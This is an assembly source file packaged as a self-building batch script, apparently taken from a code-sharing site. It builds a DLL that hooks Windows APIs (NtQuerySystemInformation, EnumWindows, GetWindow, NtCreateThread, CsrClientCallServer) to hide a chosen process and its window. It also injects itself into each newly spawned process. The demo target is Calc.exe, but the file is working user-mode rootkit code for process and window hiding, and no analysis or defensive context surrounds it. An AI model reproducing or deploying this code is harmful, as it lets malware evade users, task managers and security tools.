📄 invisibledll.bat
字号:
;@goto translate
.586P
.MODEL FLAT, STDCALL
OPTION CASEMAP: NONE
INCLUDE WINDOWS.inc
UNICODE = FALSE
INCLUDE APIMACRO.mac
INCLUDELIB iKERNEL32.lib
INCLUDELIB iUSER32.lib
INCLUDELIB iNTDLL.lib
INCLUDELIB iApiHooks.lib
INCLUDE ApiHooks.inc
OPTION NOKEYWORD: <LENGTH>
.DATA?
PROCESS_BASIC_INFORMATION STRUCT
ExitStatus DWORD ?
PebBaseAddress DWORD ?
AffinityMask DWORD ?
BasePriority DWORD ?
UniqueProcessId DWORD ?
InheritedFromUniqueProcessId DWORD ?
PROCESS_BASIC_INFORMATION ENDS
ProcessBasicInformation = 0
SystemProcessInformation = 5
OrigEnumWinProc DWORD ?
pbi PROCESS_BASIC_INFORMATION <>
pbi2 PROCESS_BASIC_INFORMATION <>
PathHooks SIGN MAX_PATH DUP (?)
.CODE
BeginHooks Entry
MkHook , NTDLL, NtCreateThread, HOOK_BY_ADDRESS, KERNEL32
MkHook , NTDLL, CsrClientCallServer, HOOK_BY_ADDRESS, KERNEL32
MkHook , NTDLL, NtQuerySystemInformation
MkHook ,USER32, EnumWindows
MkHook ,USER32, GetWindow
EndHooks
TEXTA NTDLL, <NTDLL.dll/0>
TEXTA KERNEL32, <KERNEL32.dll/0>
TEXTA USER32, <USER32.dll/0>
TEXTA NtCreateThread, <NtCreateThread/0>
TEXTA CsrClientCallServer, <CsrClientCallServer/0>
TEXTA NtQuerySystemInformation, <NtQuerySystemInformation/0>
TEXTA EnumWindows, <EnumWindows/0>
TEXTA GetWindow, <GetWindow/0>
TEXTW Proc2Hide, <Calc.exe/0>
TEXT Wind2Hide, <SciCalc/0>
;--------------------------------------------------------------------------------
DllMain:
CMP DWORD PTR [ESP+8], DLL_PROCESS_ATTACH
JNE @F
iWin32i GetModuleFileName, [ESP+12], OFFSET PathHooks, MAX_PATH
@@:
PUSH TRUE
POP EAX
RETN 12
;--------------------------------------------------------------------------------
NewNtCreateThread PROC lpThreadHandle, DesiredAccess, lpObjectAttributes,\
ProcessHandle, lpClientId, lpInitialContext,\
lpUserStackDescriptor, CreateSuspended
AND pbi2.UniqueProcessId, 0
iWin32 NtQueryInformationProcess, ProcessHandle, ProcessBasicInformation,\
OFFSET pbi, SIZEOF pbi, NULL
PUSH EAX
iWin32 NtCreateThread, lpThreadHandle, DesiredAccess, lpObjectAttributes,\
ProcessHandle, lpClientId, lpInitialContext,\
lpUserStackDescriptor, CreateSuspended
POP ECX
PUSH EAX
TEST ECX, ECX
JL @F
TEST EAX, EAX
JL @F
CMP CreateSuspended, FALSE
JE @F
CMP pbi.UniqueProcessId, 0 ;new process hasn't ID before 1st thread creation
JNE @F
iWin32 NtQueryInformationProcess, ProcessHandle, ProcessBasicInformation,\
OFFSET pbi2, SIZEOF pbi2, NULL
@@:
POP EAX
RET
NewNtCreateThread ENDP
;--------------------------------------------------------------------------------
NewCsrClientCallServer PROC lpStruc, Par1, dwCommand, StrucSize
iWin32 CsrClientCallServer, lpStruc, Par1, dwCommand, StrucSize
CMP dwCommand, 10000H
JNE @F
MOV EDX, lpStruc
CMP DWORD PTR [EDX+20H], 0
JL @F
MOV ECX, pbi2.UniqueProcessId
JECXZ @F
PUSH EAX
iWin32i EstablishApiHooksTime, OFFSET PathHooks, ECX, 10000
POP EAX
@@:
RET
NewCsrClientCallServer ENDP
;--------------------------------------------------------------------------------
NewNtQuerySystemInformation PROC USES EBX ESI, SystemInformationClass, SystemInformation,\
Length, ResultLength
iWin32 NtQuerySystemInformation, SystemInformationClass, SystemInformation,\
Length, ResultLength
TEST EAX, EAX
JL Fin
CMP SystemInformationClass, SystemProcessInformation
JNE Fin
MOV ESI, SystemInformation
@@:
MOV EBX, ESI ;prev proc
CMP DWORD PTR [ESI], 0
JE Fin
ADD ESI, [ESI]
MOV ECX, [ESI+3CH]
JECXZ @B
PUSH EAX
iWin32 lstrcmpiW, ECX, sProc2Hide
TEST EAX, EAX
POP EAX
JNE @B
MOV EDX, [ESI]
TEST EDX, EDX
JE FillZero
ADD [EBX], EDX
JMP @B ;all with my name
FillZero:
AND [EBX], EDX
JMP @B ;all with my name
Fin:
RET
NewNtQuerySystemInformation ENDP
;--------------------------------------------------------------------------------
NewEnumWindows PROC lpEnumFunc, lParam
CMP OrigEnumWinProc, NULL
JE @F
iWin32 EnumWindows, lpEnumFunc, lParam
RET
@@:
PUSH lpEnumFunc
POP OrigEnumWinProc
iWin32 EnumWindows, NewEnumProc, lParam
AND OrigEnumWinProc, NULL
RET
NewEnumWindows ENDP
NewEnumProc PROC USES ESI, hwnd, lParam
iWin32i FindWindow, sWind2Hide, NULL
TEST EAX, EAX
JE OrigEnumP
CMP EAX, hwnd
PUSH TRUE
POP EAX
JE @F
OrigEnumP:
sWin32 OrigEnumWinProc, hwnd, lParam
@@:
RET
NewEnumProc ENDP
;--------------------------------------------------------------------------------
NewGetWindow PROC USES EBX, hWnd, uCmd
iWin32i FindWindow, sWind2Hide, NULL
TEST EAX, EAX
JE NotMe
MOV EBX, EAX
CMP EAX, hWnd
JNE NotMe
CMP uCmd, GW_CHILD
JNE @F
SUB EAX, EAX
RET
@@:
iWin32 GetWindow, EAX, uCmd
Next:
MOV hWnd, EAX
NotMe:
iWin32 GetWindow, hWnd, uCmd
TEST EAX, EAX
JE Fin
CMP EAX, EBX
JE Next
Fin:
RET
NewGetWindow ENDP
;--------------------------------------------------------------------------------
END DllMain
:translate
@echo off
ML /c /coff /nologo InvisibleDLL.bat
eLINK InvisibleDLL /out:Invisible.dll /dll /nologo /optidata /section:.text,EWR /export:Entry,@1,NONAME /base:0x47280000 /SUBSYSTEM:WINDOWS /MERGE:.rdata=.text /IGNORE:4078,4086
DEL InvisibleDLL.obj
DEL Invisible.lib
DEL Invisible.exp
PAUSE
CLS⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -